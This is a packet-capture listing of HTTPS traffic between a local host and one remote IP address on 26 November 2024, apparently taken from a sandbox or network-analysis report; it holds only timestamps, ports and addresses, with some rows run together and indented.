Nov 26, 2024 08:12:17.048696995 CET 443 49708 198.252.105.91 192.168.2.10
Nov 26, 2024 08:12:17.048765898 CET 49708 443 192.168.2.10 198.252.105.91
Nov 26, 2024 08:12:17.048775911 CET 443 49708 198.252.105.91 192.168.2.10
Nov 26, 2024 08:12:17.048830032 CET 49708 443 192.168.2.10 198.252.105.91
Nov 26, 2024 08:12:17.055836916 CET 443 49708 198.252.105.91 192.168.2.10
Nov 26, 2024 08:12:17.055860996 CET 443 49708 198.252.105.91 192.168.2.10
Nov 26, 2024 08:12:17.055952072 CET 49708 443 192.168.2.10 198.252.105.91
Nov 26, 2024 08:12:17.055960894 CET 443 49708 198.252.105.91 192.168.2.10
Nov 26, 2024 08:12:17.056003094 CET 49708 443 192.168.2.10 198.252.105.91
Nov 26, 2024 08:12:17.064169884 CET 443 49708 198.252.105.91 192.168.2.10
Nov 26, 2024 08:12:17.064187050 CET 443 49708 198.252.105.91 192.168.2.10
Nov 26, 2024 08:12:17.064260960 CET 49708 443 192.168.2.10 198.252.105.91
Nov 26, 2024 08:12:17.064285040 CET 443 49708 198.252.105.91 192.168.2.10
Nov 26, 2024 08:12:17.064330101 CET 49708 443 192.168.2.10 198.252.105.91
Nov 26, 2024 08:12:17.210571051 CET 443 49708 198.252.105.91 192.168.2.10
Nov 26, 2024 08:12:17.210596085 CET 443 49708 198.252.105.91 192.168.2.10
Nov 26, 2024 08:12:17.210674047 CET 49708 443 192.168.2.10 198.252.105.91
Nov 26, 2024 08:12:17.210716009 CET 443 49708 198.252.105.91 192.168.2.10
Nov 26, 2024 08:12:17.210733891 CET 49708 443 192.168.2.10 198.252.105.91
Nov 26, 2024 08:12:17.210755110 CET 49708 443 192.168.2.10 198.252.105.91
Nov 26, 2024 08:12:17.217701912 CET 443 49708 198.252.105.91 192.168.2.10
Nov 26, 2024 08:12:17.217720985 CET 443 49708 198.252.105.91 192.168.2.10
Nov 26, 2024 08:12:17.217801094 CET 49708 443 192.168.2.10 198.252.105.91
Nov 26, 2024 08:12:17.217811108 CET 443 49708 198.252.105.91 192.168.2.10
Nov 26, 2024 08:12:17.217856884 CET 49708 443 192.168.2.10 198.252.105.91
Nov 26, 2024 08:12:17.225923061 CET 443 49708 198.252.105.91 192.168.2.10
Nov 26, 2024 08:12:17.225941896 CET 443 49708 198.252.105.91 192.168.2.10
Nov 26, 2024 08:12:17.226011038 CET 49708 443 192.168.2.10 198.252.105.91
Nov 26, 2024 08:12:17.226020098 CET 443 49708 198.252.105.91 192.168.2.10
Nov 26, 2024 08:12:17.226044893 CET 49708 443 192.168.2.10 198.252.105.91
Nov 26, 2024 08:12:17.226068020 CET 49708 443 192.168.2.10 198.252.105.91
Nov 26, 2024 08:12:17.234054089 CET 443 49708 198.252.105.91 192.168.2.10
Nov 26, 2024 08:12:17.234074116 CET 443 49708 198.252.105.91 192.168.2.10
Nov 26, 2024 08:12:17.234143019 CET 49708 443 192.168.2.10 198.252.105.91
Nov 26, 2024 08:12:17.234153032 CET 443 49708 198.252.105.91 192.168.2.10
Nov 26, 2024 08:12:17.234193087 CET 49708 443 192.168.2.10 198.252.105.91
Nov 26, 2024 08:12:17.241777897 CET 443 49708 198.252.105.91 192.168.2.10
Nov 26, 2024 08:12:17.241821051 CET 443 49708 198.252.105.91 192.168.2.10
Nov 26, 2024 08:12:17.241861105 CET 49708 443 192.168.2.10 198.252.105.91
Nov 26, 2024 08:12:17.241868973 CET 443 49708 198.252.105.91 192.168.2.10
Nov 26, 2024 08:12:17.241897106 CET 49708 443 192.168.2.10 198.252.105.91
Nov 26, 2024 08:12:17.241918087 CET 49708 443 192.168.2.10 198.252.105.91
Nov 26, 2024 08:12:17.250020981 CET 443 49708 198.252.105.91 192.168.2.10
Nov 26, 2024 08:12:17.250037909 CET 443 49708 198.252.105.91 192.168.2.10
Nov 26, 2024 08:12:17.250114918 CET 49708 443 192.168.2.10 198.252.105.91
Nov 26, 2024 08:12:17.250124931 CET 443 49708 198.252.105.91 192.168.2.10
Nov 26, 2024 08:12:17.250160933 CET 49708 443 192.168.2.10 198.252.105.91
Nov 26, 2024 08:12:17.257072926 CET 443 49708 198.252.105.91 192.168.2.10
Nov 26, 2024 08:12:17.257098913 CET 443 49708 198.252.105.91 192.168.2.10
Nov 26, 2024 08:12:17.257178068 CET 49708 443 192.168.2.10 198.252.105.91
Nov 26, 2024 08:12:17.257186890 CET 443 49708 198.252.105.91 192.168.2.10
Nov 26, 2024 08:12:17.257229090 CET 49708 443 192.168.2.10 198.252.105.91
Nov 26, 2024 08:12:17.265326023 CET 443 49708 198.252.105.91 192.168.2.10
Nov 26, 2024 08:12:17.265346050 CET 443 49708 198.252.105.91 192.168.2.10
Nov 26, 2024 08:12:17.265443087 CET 49708 443 192.168.2.10 198.252.105.91
Nov 26, 2024 08:12:17.265450001 CET 443 49708 198.252.105.91 192.168.2.10
Nov 26, 2024 08:12:17.265491009 CET 49708 443 192.168.2.10 198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.411799908 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.411828995 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.412008047 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.412029982 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.412095070 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.419969082 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.419987917 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.420094967 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.420108080 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.420192003 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.428715944 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.428735018 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.428879976 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.428891897 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.428935051 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.435477972 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.435507059 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.435612917 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.435622931 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.435664892 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.443073034 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.443101883 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.443169117 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.443176031 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.443216085 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.451294899 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.451323032 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.451411009 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.451421022 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.451477051 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.459429979 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.459460974 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.459532976 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.459544897 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.459589005 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.466665030 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.466687918 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.466768026 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.466779947 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.466820002 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.613218069 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.613249063 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.613390923 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.613429070 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.613481998 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.621345997 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.621370077 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.621444941 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.621454954 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.621494055 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.628329039 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.628361940 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.628434896 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.628446102 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.628492117 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.636467934 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.636486053 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.636578083 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.636589050 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.636635065 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.644207954 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.644228935 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.644309044 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.644320011 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.644361973 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.652390003 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.652410984 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.652493954 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:17.652503014 CET44349708198.252.105.91192.168.2.10
Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Nov 26, 2024 08:12:17.652545929 CET  49708        443        192.168.2.10    198.252.105.91
Nov 26, 2024 08:12:17.660666943 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:17.660687923 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:17.660762072 CET  49708        443        192.168.2.10    198.252.105.91
Nov 26, 2024 08:12:17.660778046 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:17.660820007 CET  49708        443        192.168.2.10    198.252.105.91
Nov 26, 2024 08:12:17.667762995 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:17.667785883 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:17.667856932 CET  49708        443        192.168.2.10    198.252.105.91
Nov 26, 2024 08:12:17.667865992 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:17.667907000 CET  49708        443        192.168.2.10    198.252.105.91
Nov 26, 2024 08:12:17.814059973 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:17.814086914 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:17.814146042 CET  49708        443        192.168.2.10    198.252.105.91
Nov 26, 2024 08:12:17.814184904 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:17.814248085 CET  49708        443        192.168.2.10    198.252.105.91
Nov 26, 2024 08:12:17.822148085 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:17.822176933 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:17.822226048 CET  49708        443        192.168.2.10    198.252.105.91
Nov 26, 2024 08:12:17.822237015 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:17.822269917 CET  49708        443        192.168.2.10    198.252.105.91
Nov 26, 2024 08:12:17.822288990 CET  49708        443        192.168.2.10    198.252.105.91
Nov 26, 2024 08:12:17.832318068 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:17.832360983 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:17.832386017 CET  49708        443        192.168.2.10    198.252.105.91
Nov 26, 2024 08:12:17.832395077 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:17.832449913 CET  49708        443        192.168.2.10    198.252.105.91
Nov 26, 2024 08:12:17.837554932 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:17.837585926 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:17.837639093 CET  49708        443        192.168.2.10    198.252.105.91
Nov 26, 2024 08:12:17.837654114 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:17.837680101 CET  49708        443        192.168.2.10    198.252.105.91
Nov 26, 2024 08:12:17.837701082 CET  49708        443        192.168.2.10    198.252.105.91
Nov 26, 2024 08:12:17.845678091 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:17.845696926 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:17.845786095 CET  49708        443        192.168.2.10    198.252.105.91
Nov 26, 2024 08:12:17.845793962 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:17.845830917 CET  49708        443        192.168.2.10    198.252.105.91
Nov 26, 2024 08:12:17.853400946 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:17.853419065 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:17.853503942 CET  49708        443        192.168.2.10    198.252.105.91
Nov 26, 2024 08:12:17.853512049 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:17.853555918 CET  49708        443        192.168.2.10    198.252.105.91
Nov 26, 2024 08:12:17.861579895 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:17.861624002 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:17.861669064 CET  49708        443        192.168.2.10    198.252.105.91
Nov 26, 2024 08:12:17.861680031 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:17.861713886 CET  49708        443        192.168.2.10    198.252.105.91
Nov 26, 2024 08:12:17.861737967 CET  49708        443        192.168.2.10    198.252.105.91
Nov 26, 2024 08:12:17.869885921 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:17.869905949 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:17.869986057 CET  49708        443        192.168.2.10    198.252.105.91
Nov 26, 2024 08:12:17.869993925 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:17.870040894 CET  49708        443        192.168.2.10    198.252.105.91
Nov 26, 2024 08:12:18.015522957 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:18.015552998 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:18.015674114 CET  49708        443        192.168.2.10    198.252.105.91
Nov 26, 2024 08:12:18.015696049 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:18.015743017 CET  49708        443        192.168.2.10    198.252.105.91
Nov 26, 2024 08:12:18.023463964 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:18.023482084 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:18.023542881 CET  49708        443        192.168.2.10    198.252.105.91
Nov 26, 2024 08:12:18.023555040 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:18.023581028 CET  49708        443        192.168.2.10    198.252.105.91
Nov 26, 2024 08:12:18.023601055 CET  49708        443        192.168.2.10    198.252.105.91
Nov 26, 2024 08:12:18.031653881 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:18.031676054 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:18.031769991 CET  49708        443        192.168.2.10    198.252.105.91
Nov 26, 2024 08:12:18.031778097 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:18.031829119 CET  49708        443        192.168.2.10    198.252.105.91
Nov 26, 2024 08:12:18.039153099 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:18.039171934 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:18.039309025 CET  49708        443        192.168.2.10    198.252.105.91
Nov 26, 2024 08:12:18.039321899 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:18.039365053 CET  49708        443        192.168.2.10    198.252.105.91
Nov 26, 2024 08:12:18.047538042 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:18.047555923 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:18.047638893 CET  49708        443        192.168.2.10    198.252.105.91
Nov 26, 2024 08:12:18.047646046 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:18.047688007 CET  49708        443        192.168.2.10    198.252.105.91
Nov 26, 2024 08:12:18.054797888 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:18.054816961 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:18.054943085 CET  49708        443        192.168.2.10    198.252.105.91
Nov 26, 2024 08:12:18.054949999 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:18.055001020 CET  49708        443        192.168.2.10    198.252.105.91
Nov 26, 2024 08:12:18.062877893 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:18.062899113 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:18.063024044 CET  49708        443        192.168.2.10    198.252.105.91
Nov 26, 2024 08:12:18.063030005 CET  443          49708      198.252.105.91  192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.063075066 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.071110010 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.071131945 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.071198940 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.071208954 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.071238041 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.071264982 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.217164993 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.217189074 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.217335939 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.217346907 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.217392921 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.225219965 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.225236893 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.225303888 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.225310087 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.225354910 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.232409000 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.232424974 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.232501984 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.232508898 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.232552052 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.240667105 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.240684986 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.240765095 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.240771055 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.240847111 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.248343945 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.248363972 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.248466015 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.248473883 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.248516083 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.256529093 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.256545067 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.256597042 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.256659031 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.256664991 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.256705999 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.264684916 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.264704943 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.264790058 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.264796972 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.264844894 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.272883892 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.272908926 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.272969007 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.272977114 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.273005009 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.273027897 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.418411016 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.418435097 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.418562889 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.418576002 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.418621063 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.426547050 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.426569939 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.426640034 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.426649094 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.426675081 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.426697969 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.434731960 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.434750080 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.434844971 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.434853077 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.434900045 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.441888094 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.441905975 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.441962957 CET49708443192.168.2.10198.252.105.91
